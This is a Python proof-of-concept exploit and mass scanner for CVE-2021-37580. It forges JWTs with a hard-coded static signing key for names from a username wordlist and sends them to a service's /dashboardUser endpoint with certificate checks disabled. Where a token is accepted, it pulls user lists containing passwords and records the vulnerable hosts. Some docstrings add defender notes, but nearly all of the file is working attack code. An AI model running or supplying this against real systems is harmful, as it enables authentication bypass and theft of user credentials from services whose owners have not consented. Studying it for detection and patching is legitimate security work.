#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Date : 2021-11-17 20:40:04
# @Author : 江南小虫虫 ([email protected])
# @Link : https://fengwenhua.top
import jwt
import time
import requests
import json
import sys
import argparse
# Silence urllib3 warnings for the whole run, e.g. the insecure-request
# warning that each ``verify=False`` request made in poc() would otherwise
# print; certificate checking itself is still disabled down there.
requests.packages.urllib3.disable_warnings()
def generateToken(username):
    """Forge an HS256 JWT for *username* signed with the fixed key below.

    This is the core of the CVE-2021-37580 issue: the verifying side of the
    affected service uses a static, publicly known signing key, so a token
    built with that key passes its validation for any ``userName`` claim.
    The remediation on the defender's side is to upgrade to a fixed release
    and to sign tokens with a strong, per-deployment secret.

    Args:
        username: value placed in the ``userName`` claim.

    Returns:
        The compact JWT as a ``str``.
    """
    headers = {
        "alg": "HS256",
        "typ": "JWT"
    }
    # JWT header: declares the signing algorithm the token claims to use.
    salt = "2095132720951327"
    # The static signing key. It is meant to be known only to the token
    # issuer (which is also the verifier) so that it can check tokens are
    # genuine; a fixed, shared value defeats that purpose entirely.
    exp = int(time.time())
    # Expiry claim. The original note said "100 s after now", but no offset
    # is added: the value is simply the current Unix time.
    payload = {
        "userName": username,
        "exp": exp
    }
    # Claims. A JWT payload is only base64-encoded, not encrypted, so nothing
    # sensitive belongs in it unless it has been encrypted beforehand.
    token = jwt.encode(payload=payload, key=salt,
                       algorithm='HS256', headers=headers).decode('utf-8')
    # Decoded to str; the PoC expects jwt.encode to return bytes here.
    # print(token)
    return token
def load_file(file_path):
    """Read *file_path* and return its lines with line endings stripped.

    Any failure while opening or reading is printed to stdout and ends the
    process with status -1. When the error text mentions ``username.txt``
    (the default dictionary name) a dedicated hint about supplying a user
    name list with ``-n`` is printed instead of the raw error.
    """
    try:
        with open(file_path, 'r') as handle:
            lines = handle.read().splitlines()
    except Exception as err:
        # The hint is chosen purely by looking for the default file name in
        # the exception text, exactly as the original did.
        if 'username.txt' in str(err):
            print(
                '找不到用户名字典文件!!!请用参数-n 指定一个用户名字典.txt,或者新建一个 username.txt,放在脚本的同目录下,文件的内容是,一行一个用户名')
        else:
            print(err)
        sys.exit(-1)
    return lines
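def write_file(data_list, stamp=None):
    """Write *data_list*, one entry per line, to ``CVE-2021-37580-vul-list-<stamp>.txt``.

    The file is created in the current working directory and the entries
    are joined with ``\n`` (no trailing newline).

    Args:
        data_list: strings to write.
        stamp: suffix for the output file name. Defaults to the module-level
            ``log_time`` set by the CLI driver, so existing callers that pass
            a single argument keep their old behaviour.

    Raises:
        NameError: if ``stamp`` is omitted and ``log_time`` is not defined.
    """
    if stamp is None:
        # Preserve the original implicit dependency on the driver's global.
        stamp = log_time
    with open('CVE-2021-37580-vul-list-{}.txt'.format(stamp), 'w') as f:
        f.write('\n'.join(data_list))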
def poc(host, username):
    """Check one host for CVE-2021-37580 using a token forged for *username*.

    Sends ``GET <host>/dashboardUser`` with the forged JWT in the
    ``X-Access-Token`` header, with certificate verification disabled. On an
    HTTP 200 whose body contains ``password`` the ``data.dataList`` field of
    the JSON body is returned; any other response yields ``False``.

    Defender notes: the observable of this probe is a request to
    ``/dashboardUser`` carrying an ``X-Access-Token`` the service never
    issued, sent with the fixed Firefox 93 User-Agent below. An instance
    that signs tokens with a proper secret is expected to reject the token
    (see the example body in the else branch) rather than return user data.

    Args:
        host: base URL of the instance, scheme included.
        username: value placed in the forged token's ``userName`` claim.

    Returns:
        The parsed ``data.dataList`` value on a positive result, else ``False``.
    """
    url = host + '/dashboardUser'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0',
        'X-Access-Token': generateToken(username)
    }
    r = requests.get(url, headers=headers, verify=False)
    result = r.text
    # print(result)
    if r.status_code == 200 and 'password' in result:
        # A 200 with a user listing is taken as proof the token was accepted;
        # a body missing the data/dataList keys raises KeyError to the caller.
        dataList = json.loads(result)['data']['dataList']
        #print('{} is VUL!! '.format(host))
        # print(dataList)
        return dataList
    else:
        # {"code":600,"message":"token is error"}
        # Example of the rejection body noted by the author for this branch.
        # print('{} is NO VUL'.format(host))
        return False
if __name__ == '__main__':
    # CLI driver: probe a single URL (-u) and/or every URL in a file (-f)
    # with each user name from the dictionary file (-n). Progress is echoed
    # to stdout and to a timestamped log file in the current directory; in
    # file mode the hosts that returned data are also written out.
    if len(sys.argv) == 1:
        print("Usage: python3 CVE-2021-37580.py -u url -n username.txt")
        sys.exit()
    parser = argparse.ArgumentParser(
        description='CVE-2021-37580 poc工具')
    parser.add_argument('-u', '--url', help='指定单个url')
    parser.add_argument('-f', '--file', help='指定url.txt')
    parser.add_argument(
        '-n', '--name', default='username.txt', help='指定用户名文件字典.txt')
    args = parser.parse_args()
    target = args.url
    name_file = args.name
    # log_time is also read as a module-level name by write_file().
    log_time = int(time.time())
    # The log handle is only closed on the last line; an uncaught exception
    # leaves it to the interpreter to flush.
    logs_file = open('CVE-2021-37580-log-{}.txt'.format(log_time), 'w')
    vul = False
    if target:
        # Substring test: anything containing "http" is used as given,
        # everything else gets an http:// prefix.
        if not 'http' in target:
            target = 'http://' + target
        print('[*] checking {}'.format(target))
        print('[*] checking {}'.format(target), file=logs_file)
        try:
            # Stop at the first user name whose forged token is accepted.
            for name in load_file(name_file):
                print('[*] using name: {}'.format(name))
                print('[*] using name: {}'.format(name), file=logs_file)
                res = poc(target, name)
                if res:
                    print('[+] {} is VUL!! '.format(target))
                    print('[+] {} is VUL!! '.format(target), file=logs_file)
                    print(res)
                    vul = True
                    break
            if not vul:
                print('[-] {} is NO VUL!! '.format(target))
                print('[-] {} is NO VUL!! '.format(target), file=logs_file)
        except Exception as e:
            # Any error (network, JSON shape, ...) is printed and the single
            # target mode simply ends.
            print(e)
    if args.file:
        vul_url_list = []
        try:
            for url in load_file(args.file):
                if not 'http' in url:
                    url = 'http://' + url
                print('[*] checking {}'.format(url))
                print('[*] checking {}'.format(url), file=logs_file)
                try:
                    for name in load_file(name_file):
                        print('[*] using name: {}'.format(name))
                        print('[*] using name: {}'.format(name), file=logs_file)
                        res = poc(url, name)
                        if res:
                            print('[+] {} is VUL!! '.format(url))
                            print('[+] {} is VUL!! '.format(url),
                                  file=logs_file)
                            print(res)
                            print(res, file=logs_file)
                            vul = True
                            vul_url_list.append(url)
                            break
                    # NOTE: vul is never reset between URLs (and is shared with
                    # the -u branch), so once it is True later hosts skip the
                    # "NO VUL" line below.
                    if not vul:
                        print('[-] {} is NO VUL!! '.format(url))
                        print('[-] {} is NO VUL!! '.format(url), file=logs_file)
                except Exception as e:
                    # Per-host failures are logged and the scan moves on.
                    print(e)
                    print(e, file=logs_file)
                print('\r\n')
                print('\r\n', file=logs_file)
        except Exception as e:
            print(e)
            print(e, file=logs_file)
        if len(vul_url_list) > 0:
            write_file(vul_url_list)
            # The name printed here omits the "-<log_time>" suffix that
            # write_file() actually appends to the file it creates.
            print("有漏洞的url列表已经写入文件当前目录下的 CVE-2021-37580-vul-list.txt 了")
    logs_file.close()